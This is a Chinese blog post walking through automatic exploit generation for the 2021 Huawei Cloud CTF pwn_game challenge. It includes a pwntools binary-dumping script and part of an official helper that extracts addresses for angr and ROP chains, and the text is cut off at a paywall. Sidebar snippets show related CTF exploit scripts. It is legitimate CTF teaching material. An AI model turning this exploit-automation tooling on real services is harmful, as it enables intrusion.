CTF中的AEG(五) 2021 华为云专场 pwn_game

最新推荐文章于 2024-04-07 10:56:38 发布
最新推荐文章于 2024-04-07 10:56:38 发布
阅读量758 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yongbaoii/article/details/122907048

在本地搭了环境
相关的docker啥的官方给了
在github
搜一下就可

nc一下
在这里插入图片描述先用相应脚本把程序拿出来

import re
import itertools
import string
import codecs
from hashlib import sha256
from pwn import remote, context
import os
import itertools
import datetime
context.log_level = 'debug'


def exp():
    sh = remote('127.0.0.1' , "9997")
    sh.recvuntil("data info------------------\n")
    d = sh.recvuntil("Hi")
    d = d[:-3]
    print d
    with open('out.data', 'wb') as f:
        f.write(d)

    os.system('base64 -d out.data > 1.elf')
    
    sh.interactive()
    

while(1):
    exp()

多拿几个
看一下保护
在这里插入图片描述没有canary、pie、relro

拿到的文件丢到ida看一下
在这里插入图片描述在这里插入图片描述
他让我们运行这个程序,后面带上输入
输入的作用就是作为参数,进去过约束
然后直接就是一个栈溢出。
程序简直不要太简单
我们多来几个文件试试看他在什么地方随机

在这里插入图片描述四个程序
这就显而易见了嘛

约束当然是随机的
栈溢出的长度也是随机的
payload最大长度也是随机的,不过这个应该影响不大。

额外提一句时间是3s

我们一起来瞅瞅官方给的wp咋写的。
get_addr.py

import commands

#封装了一个执行命令行命令的函数
def do_command(cmd_line):
	(status, output) = commands.getstatusoutput(cmd_line)
	return output
​
#在字符串中间找一个字符串
def get_mid_str(data, b_str, e_str, s_pos = 0):
	b_pos = data.find(b_str, s_pos)
	if b_pos == -1:
		return ""
	b_pos += len(b_str)
	e_pos = data.find(e_str, b_pos)
​
	data = data[b_pos:e_pos]
	#print s_pos, b_pos, e_pos
	#print data
	while b_str in data:
		data = data[data.find(b_str)+len(b_str):]
	#print data
	return data
​
#一个写文件操作
def write_file(filename, data, mode = "wb"):
	file_w = open(filename, mode)
	file_w.write(data)
	file_w.close()#对那个dump下来的二进制文件进行处理
#把解题要用的相关信息拿出来丢在angr_deal.conf文件中
def do_angr_conf():
	tmp_file_asm = do_command("objdump -d tmp_file.bin")
​
	b_pos = tmp_file_asm.find("<__libc_start_main@plt>\n")
​
	main_addr = get_mid_str(tmp_file_asm, " mov   $0x", ",%rdi\n", b_pos - 0x80)
	#print main_addr
	b_pos = tmp_file_asm.find("%s:"%main_addr)
	b_pos = tmp_file_asm.find(" <atoi@plt>\n", b_pos)
	deal_func_addr = get_mid_str(tmp_file_asm, "callq ", " <", b_pos)
	print "start_addr =>", deal_func_addr
​
	b_pos = tmp_file_asm.find("%s:"%deal_func_addr)
	s_b_pos = tmp_file_asm.find(" callq ", b_pos - 0x100)
	success = get_mid_str(tmp_file_asm, "$0x1,%eax\n ", ": ", s_b_pos - 0x80)
	print "success =>", success
	f_b_pos = tmp_file_asm.find("leave", b_pos)
	fail = get_mid_str(tmp_file_asm, "$0x0,%eax\n ", ": ", f_b_pos - 0x80)
	print "fail =>", fail
​
	data_write = ""
	data_write += deal_func_addr + "\n"
	data_write += success + "\n"
	data_write += fail + "\n"
​
	write_file("angr_deal.conf", data_write)#进行一些pwn用的设置
#具体来说就是先ROPgadget直接搜要用的gadget
#然后把rop链写在do_pwn_next.conf文件里面一会用
def do_pwn_conf(
最低0.47元/天 解锁文章
攻防世界 PWN 高手进阶 dice_game (write up)
qq_44768749的博客
08-18 508
攻防世界 PWN 高手进阶 dice_gamedice_game0x01 查看保护机制0x02 反汇编main:sub_A20():sub_B28():0x03利用过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 dice_ga
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 713
  0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜数字,连续答对50轮可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50轮,并可以注意到18行设置了随机数的种子。...
CTF中的AEG()aeg题目源码分析 华为云专场-pwn_game
yongbaoii的博客
04-18 602
想起来就发点
ISCC2021-[pwn]game
半岛铁盒的博客
05-26 729
from pwn import * from ctypes import * p = remote('39.96.88.40','7040') context.log_level="debug" payload = b'a' * (0x30-0x8) + p32(0) p.sendlineafter("Your name is :",payload) rand = ['55 ','15 ','82 ','1 ','98 ','68 ','67 ','15 ','86 ','3 '] fo...
攻防世界dice_game(pwn)
CTF小白的博客
05-08 4821
dice_game 题目考察:rand()生成的随机数和随机种子seed()有关,通过观察题目,可以发现存在溢出漏洞,通过输入可以覆盖到seed(),实现一个可预测的随机数列。 题目分析 这边就可以看到,buf覆盖0x40位就能覆盖到seed。 sub_A20()如下,就是比较你输入的数是否和产生的随机数相等。 当回答正确50次时,会执行sub_B28这个函数,读取flag。 所以我们要做...
BUUCTF pwn qctf_2018_dice_game
热门推荐
stareforever的博客
12-25 3万+
查看保护 程序流程 输入name后 连续猜对50次随机数即可获得flag 输入buf的可以覆盖栈上的内容,那么输入0x50个字符就可以覆盖seed,最终产生的随机数就是定值了 考虑输入0x50个‘A’,那么写c程序 可以获得生成的随机数列表 3, 3, 2, 1, 5, 3, 4, 6, 3, 4, 2, 2, 3, 2, 1, 1, 4, 5, 4, 6, 3, 6, 4, 3, 4, 2, 2, 6, 1, 2, 2, 3, 4, 1, 2, 1, 4, 5, 4, 6, 6, 5, 1, 3,
pwn_dice_game
weixin_44464829的博客
10-31 318
常规操作:checksec dice_game 发现文件是64位 放入ida中看c的伪代码: 这是一个猜数字的题,之前有做过类似的题,目的是覆盖seed,使随机数不再随机产生 点开sub_A20()看看随机数怎么构造的: 可以看到rand()%6+1线性同余的方式生成随机数,下一步就是想要覆盖掉种子位置上的值 看一下种子的位置: buf是我们可以写 入数据的缓冲区,通过read函数写入,这又是经典的栈溢出漏洞 0x50-0x10=0x40 因为附件解压后有两个文件,其中一个是l
攻防世界pwn——dice_game
qq_62076255的博客
12-19 565
攻防世界pwn——dice_game做题记录
pwnable.kr aeg题解
最新发布
Zeredy的博客
04-07 878
pwnable.kr aeg的题解
漏洞挖掘 符号执行_初探利用angr进行漏洞挖掘(上)
weixin_39943678的博客
12-15 2003
前言angr是一个基于python开发的一款符号执行工具,可以用于二进制分析,在CTF逆向中有很大的用途,例如可以通过约束求解找到复杂计算的正确解,从而拿到flag;然而angr的用途远不止于此,它甚至还能被用于AEG (Automatic Exploit Generation) ,有一个叫zeratool的工具实现了一些用于简单的pwnAEGAEG的步骤一般分为:挖掘漏洞生成利用exp验证e...
Zeratool:自动利用漏洞利用(AEG)和远程标志捕获来解决可利用的CTF问题
04-29
Zeratool 自动利用漏洞利用(AEG)和远程标志捕获来解决可利用的CTF问题 该工具使用通过挂接printf并查找来协整地分析二进制文件。 然后,这些程序状态通过和一系列脚本技巧被武器化以用于远程代码执行。 最后,在本地对有效负载进行测试,然后将其提交给远程CTF服务器以恢复该标志。 正在安装 Zeratool已在Ubuntu 16.04上进行了测试,并且已将安装脚本从Ubuntu 12.04设置为Ubuntu 18.04。 ./install.sh 用法 Zeratool是一个python脚本,它接受二进制文件作为参数,还可以选择链接的libc库,以及CTF Server连接信息 [chris:~/Zeratool] [angr] python zeratool.py -h usage: zeratool.py [-h] [-l LIBC] [-u URL] [-p PORT]
2020XCTF华为云专场pwn题WP
Sakura给爷pwn全场
12-23 569
Pwn CPP 解题思路 题⽬存在uaf,结合堆⻛⽔getshell #!/usr/bin/python #coding:utf-8 from pwn import * context.log_level='debug' #io=process("./chall",env={"LD_PRELOAD":"./libc-2.31.so"}) io=remote('124.70.12.210', 10002) libc=ELF("./libc-2.31.so") sla=lambda a : io.sendlin
漏洞挖掘 符号执行_漏洞挖掘、利用及修复——从人工到自动的跨越
weixin_42164702的博客
12-29 890
随着互联网的普及,各类App如雨后春笋般产生。受限于代码质量,App中或多或少的会存在各类漏洞。据统计,CVE(http://cve.mitre.org/)及CNNVD(http://www.cnnvd.org.cn/)能够涵盖的漏洞多达100000个,严重威胁着网络及用户安全。当前,二进制漏洞挖掘主要依靠专业人员的人工审计,从而能够提供准确的漏洞点、漏洞利用及修补方案。然而,人工审计与挖掘存在以...
CTF中的AEG() 基础知识
yongbaoii的博客
04-06 1020
很早之前学习的 忘了还有这玩意
Pwn的虚拟机
qq_43553690的博客
08-09 1817
Pwn的虚拟机 刚刚接触到Pwn这个方向,学习教程上面的各种命令和操作。 但是,没有视频中那些工具,学习的效率会降低。 最好,教学视频上的每一个指令都直接亲手打一遍。 去理解每个知识点的意思。 然后放上来一个做pwn题的虚拟机,方便新手去学习。 这个虚拟机文件导出格式为ovf格式。 点击红色方框来打开。 然后等待一会就可以了。 我的用户名是:isidro 密码是:toor root的...
CTF中的AEG() 2019 QWB babyaeg
yongbaoii的博客
04-18 407
@
dice_game [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列12
重新启程
12-23 1915
题目地址:dice_game 从这篇开始就正式进入高手进阶区,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
CTFpwn总结 入门
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
一道ctf pwn 的思路以及解法
tiaotiaolong99234的博客
06-23 1万+
一道ctf   pwn  的思路以及解法                                                                               -------TTL     前几天参加选拔,第一道pwn最后时候也没做出来,后来问了一下糖果,原来是脚本写错了。也怪前面的那到逆向re2。。就剩10分钟了,找到了pwn的漏洞,poc写错了。现在写
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值